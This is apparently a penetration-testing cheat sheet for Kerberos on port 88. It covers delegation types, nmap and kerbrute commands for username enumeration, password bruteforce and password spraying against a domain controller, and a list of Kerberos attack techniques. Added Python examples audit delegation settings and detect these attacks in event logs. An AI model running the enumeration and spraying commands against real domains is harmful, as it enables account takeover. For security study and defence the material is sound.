Kerberos – port 88

Kerberos is an authentication protocol that works on the basis of tickets to allow nodes to prove their identity to one another in a secure manner. Its designers aimed it primarily at a client–server model, and it provides mutual authentication – both the user and the server verify each other’s identity.

Kerberos is based on tickets that expire after a set lifetime. The pre-authentication scheme is based on a “long-term” key (a key derived from the user’s password). Kerberos also supports certificates (PKINIT) for pre-authentication.

Kerberos Delegation

  • [KUD] Unconstrained: the account can delegate to any service; delegation is set on the account; requires domain admin privileges (SeEnableDelegationPrivilege in the domain)
  • [KCD] Constrained: the account can delegate to a set of services; delegation is set on the account; requires domain admin privileges (SeEnableDelegationPrivilege in the domain)
    • With protocol transition (“Use any auth. protocol”)
    • Without protocol transition (“Kerberos only”)
  • [RBCD] Resource-Based Constrained: a set of services can delegate to the account; delegation is set on the resource account itself; does NOT require high privileges, so a machine can configure itself for RBCD
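The three delegation flavours above map to a handful of LDAP attributes, which is what a defender audits for: the TRUSTED_FOR_DELEGATION bit of userAccountControl for KUD, msDS-AllowedToDelegateTo (plus the TRUSTED_TO_AUTH_FOR_DELEGATION bit for protocol transition) for KCD, and msDS-AllowedToActOnBehalfOfOtherIdentity on the resource for RBCD. The following is an added Python example, not code from the original cheat sheet: it classifies constructed account records with those documented attributes. The RBCD attribute is simplified from its real form (a binary security descriptor) to a list of trustee names, which is an assumption of this example.

```python
# Added example, not part of the original page: audit how accounts are
# configured for Kerberos delegation from an LDAP export. All account
# records below are constructed.

# userAccountControl bits that govern delegation (Microsoft-documented values)
TRUSTED_FOR_DELEGATION = 0x80000            # [KUD] unconstrained delegation
TRUSTED_TO_AUTH_FOR_DELEGATION = 0x1000000  # [KCD] "Use any auth. protocol" (protocol transition)
SERVER_TRUST_ACCOUNT = 0x2000               # domain controller computer account


def classify_delegation(account):
    """Return a list of (label, risk) findings for one account.

    The dict keys mirror LDAP attribute names. In a real export,
    msDS-AllowedToActOnBehalfOfOtherIdentity is a binary security descriptor;
    this example assumes it has already been reduced to the list of principals
    whose ACEs grant the delegation.
    """
    uac = account.get("userAccountControl", 0)
    kcd_targets = account.get("msDS-AllowedToDelegateTo") or []
    rbcd_trustees = account.get("msDS-AllowedToActOnBehalfOfOtherIdentity") or []
    findings = []

    if uac & TRUSTED_FOR_DELEGATION:
        if uac & SERVER_TRUST_ACCOUNT:
            # Domain controllers are unconstrained by design; flag everything else.
            findings.append(("KUD on domain controller", "expected"))
        else:
            findings.append(("KUD", "high"))
    if kcd_targets:
        if uac & TRUSTED_TO_AUTH_FOR_DELEGATION:
            findings.append(("KCD with protocol transition", "high"))
        else:
            findings.append(("KCD (Kerberos only)", "medium"))
    if rbcd_trustees:
        # RBCD is configured on the resource; its risk depends on who is trusted.
        findings.append(("RBCD target", "medium"))
    return findings


def audit(accounts):
    """Map each sAMAccountName to its findings, skipping accounts with none."""
    report = {}
    for acct in accounts:
        findings = classify_delegation(acct)
        if findings:
            report[acct["sAMAccountName"]] = findings
    return report


# Constructed sample export (UAC values are the documented bits OR-ed together)
SAMPLE_ACCOUNTS = [
    {"sAMAccountName": "DC01$", "userAccountControl": 0x82000},     # SERVER_TRUST_ACCOUNT | TRUSTED_FOR_DELEGATION
    {"sAMAccountName": "WEB01$", "userAccountControl": 0x81000},    # WORKSTATION_TRUST_ACCOUNT | TRUSTED_FOR_DELEGATION
    {"sAMAccountName": "svc_iis", "userAccountControl": 0x1000200,  # NORMAL_ACCOUNT | TRUSTED_TO_AUTH_FOR_DELEGATION
     "msDS-AllowedToDelegateTo": ["cifs/fileserver.example.com"]},
    {"sAMAccountName": "svc_report", "userAccountControl": 0x200,   # NORMAL_ACCOUNT
     "msDS-AllowedToDelegateTo": ["MSSQLSvc/sql01.example.com:1433"]},
    {"sAMAccountName": "FILE01$", "userAccountControl": 0x1000,     # WORKSTATION_TRUST_ACCOUNT
     "msDS-AllowedToActOnBehalfOfOtherIdentity": ["WEB01$"]},
    {"sAMAccountName": "alice", "userAccountControl": 0x200},
]

if __name__ == "__main__":
    for name, findings in audit(SAMPLE_ACCOUNTS).items():
        for label, risk in findings:
            print(f"{name:12} {risk:9} {label}")
```

In practice the account list comes from an LDAP query for objects with TRUSTED_FOR_DELEGATION or TRUSTED_TO_AUTH_FOR_DELEGATION set, or with either msDS-* attribute populated; anything flagged KUD that is not a domain controller is the first thing to review.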

Nmap scripts

IP=x.x.x.x
ls -la /usr/share/nmap/scripts/krb*

User enumeration

Official Documentation

The Kerberos Realm is often the domain in uppercase! Try all these username lists 😉

USERS=/usr/share/seclists/Usernames/top-usernames-shortlist.txt
#USERS=/usr/share/seclists/Usernames/Names/names.txt
#USERS=/usr/share/seclists/Usernames/cirt-default-usernames.txt
REALM=EXAMPLE.COM
nmap -p 88 --script krb5-enum-users --script-args krb5-enum-users.realm=${REALM} $IP

Really fast!

nmap -p 88 --script krb5-enum-users --script-args krb5-enum-users.realm=${REALM},userdb=${USERS} $IP

Bruteforce

Official Documentation (GitHub)

Install kerbrute

sudo pip3 install kerbrute

Help

kerbrute -h

Bruteforce usernames

USE NMAP SCRIPT INSTEAD, WAY FASTER!

IP=x.x.x.x
DOMAIN=example.com
USERS=/usr/share/seclists/Usernames/Names/names.txt
#USERS=/usr/share/seclists/Usernames/top-usernames-shortlist.txt
#USERS=/usr/share/seclists/Usernames/cirt-default-usernames.txt
kerbrute -dc-ip $IP -domain $DOMAIN -users $USERS -password "12345" -outputusers kerbrute-users-${IP}.txt

Bruteforce passwords

IP=x.x.x.x
USER=myprecious
USERS=users.txt
DOMAIN=example.com
WL=/usr/share/seclists/Passwords/Common-Credentials/best1050.txt
#WL=/usr/share/wordlists/rockyou.txt
kerbrute -dc-ip $IP -domain $DOMAIN -user $USER -passwords $WL -outputfile kerbrute-${IP}.txt
kerbrute -dc-ip $IP -domain $DOMAIN -users $USERS -passwords $WL -outputfile kerbrute-${IP}.txt

Password Spray

PASS='Password123'
kerbrute -dc-ip $IP -domain $DOMAIN -users $USERS -password $PASS -outputfile kerbrute-spray-${IP}.txt
# Same spray with ropnop's Go kerbrute (a different tool with the same name and a different CLI)
kerbrute -d $DOMAIN passwordspray $USERS 'Password123'
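On the defender's side, the enumeration, bruteforce and spraying above leave distinct footprints in the domain controller's Security log: username enumeration produces a burst of event 4768 with result code 0x6 (KDC_ERR_C_PRINCIPAL_UNKNOWN) for many different non-existent names from one source, while password guessing produces event 4771 with failure code 0x18 (KDC_ERR_PREAUTH_FAILED), either many times against one account (bruteforce) or once across many accounts (spray). The following is an added Python example, not part of the original cheat sheet, that runs those three checks over sample events. The log lines are constructed in a simplified pipe-separated form rather than the real event XML, and the thresholds are assumptions to be tuned per environment.

```python
# Added example, not part of the original page: detect Kerberos user
# enumeration, password bruteforce and password spraying from DC events.
from collections import Counter, defaultdict

# Constructed sample mimicking the relevant fields of Windows Security events
# 4768 (TGT requested) and 4771 (Kerberos pre-authentication failed):
#   EventID | TargetUserName | IpAddress | Status
# Status 0x6  on 4768 = KDC_ERR_C_PRINCIPAL_UNKNOWN (the user does not exist)
# Status 0x18 on 4771 = KDC_ERR_PREAUTH_FAILED (wrong password)
SAMPLE_LOG = """\
4768|alice|10.0.0.50|0x0
4768|zed|10.0.0.99|0x6
4768|yasmin|10.0.0.99|0x6
4768|xander|10.0.0.99|0x6
4768|walt|10.0.0.99|0x6
4768|bob|10.0.0.99|0x0
4771|bob|10.0.0.77|0x18
4771|carol|10.0.0.77|0x18
4771|dave|10.0.0.77|0x18
4771|erin|10.0.0.77|0x18
4771|svc_backup|10.0.0.60|0x18
4771|svc_backup|10.0.0.60|0x18
4771|svc_backup|10.0.0.60|0x18
4771|svc_backup|10.0.0.60|0x18
4771|svc_backup|10.0.0.60|0x18
4771|alice|10.0.0.50|0x18
"""


def parse_events(text):
    """Parse the simplified log format into a list of event dicts."""
    events = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        event_id, user, ip, status = line.split("|")
        events.append({"event_id": int(event_id), "user": user.lower(),
                       "source": ip, "status": int(status, 16)})
    return events


def detect(events, enum_threshold=3, spray_threshold=3, brute_threshold=3):
    """Group failures by source address and apply the three detections.

    Thresholds are assumptions for this example; real baselines depend on the
    environment (helpdesk hosts, mistyped names and lockout policy).
    """
    unknown_by_src = defaultdict(set)       # source -> distinct unknown names
    failed_by_src = defaultdict(Counter)    # source -> {account: failure count}
    for ev in events:
        if ev["event_id"] == 4768 and ev["status"] == 0x6:
            unknown_by_src[ev["source"]].add(ev["user"])
        elif ev["event_id"] == 4771 and ev["status"] == 0x18:
            failed_by_src[ev["source"]][ev["user"]] += 1

    alerts = {"enumeration": [], "spraying": [], "bruteforce": []}
    for src in sorted(unknown_by_src):
        names = unknown_by_src[src]
        if len(names) >= enum_threshold:
            alerts["enumeration"].append({"source": src, "unknown_names": len(names)})
    for src in sorted(failed_by_src):
        per_account = failed_by_src[src]
        # Spray: one source, one or two guesses each against many accounts
        if len(per_account) >= spray_threshold:
            alerts["spraying"].append({"source": src, "accounts": len(per_account),
                                       "failures": sum(per_account.values())})
        # Bruteforce: one source hammering a single account
        for account in sorted(per_account):
            if per_account[account] >= brute_threshold:
                alerts["bruteforce"].append({"source": src, "account": account,
                                             "failures": per_account[account]})
    return alerts


if __name__ == "__main__":
    for kind, hits in detect(parse_events(SAMPLE_LOG)).items():
        for hit in hits:
            print(kind, hit)
```

Against real data the same logic applies once EventID, TargetUserName, IpAddress and Status are extracted from the event XML; a source that trips the enumeration rule and then the spray rule a few minutes later is the sequence the commands above produce.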

Exploits

Ideas (The Hacker Recipes): Pre-auth bruteforce, Pass the key, Pass the ticket, Pass the cache, Pass the certificate, Overpass the hash, UnPAC the hash, Forged tickets (Golden ticket, Silver tickets, Diamond tickets, Sapphire tickets, RODC Golden tickets), ASREQroast, ASREProasting, Kerberoast, Delegations (e.g. S4U abuse), Shadow credentials, sAMAccountName spoofing, SPN-jacking

AS-REP Roasting

See AS-REP Roasting.

Kerberoasting

See Kerberoasting.

Overpass the Hash/Pass the Key

See Overpass the Hash/Pass the Key.

MS14-068 – Privilege Escalation

In November 2014, Microsoft released a patch (MS14-068) to fix an exploitable vulnerability in the Windows implementation of the Kerberos Key Distribution Center (KDC). The vulnerability purportedly allowed users to “elevate” (and abuse) their privileges, up to Domain level.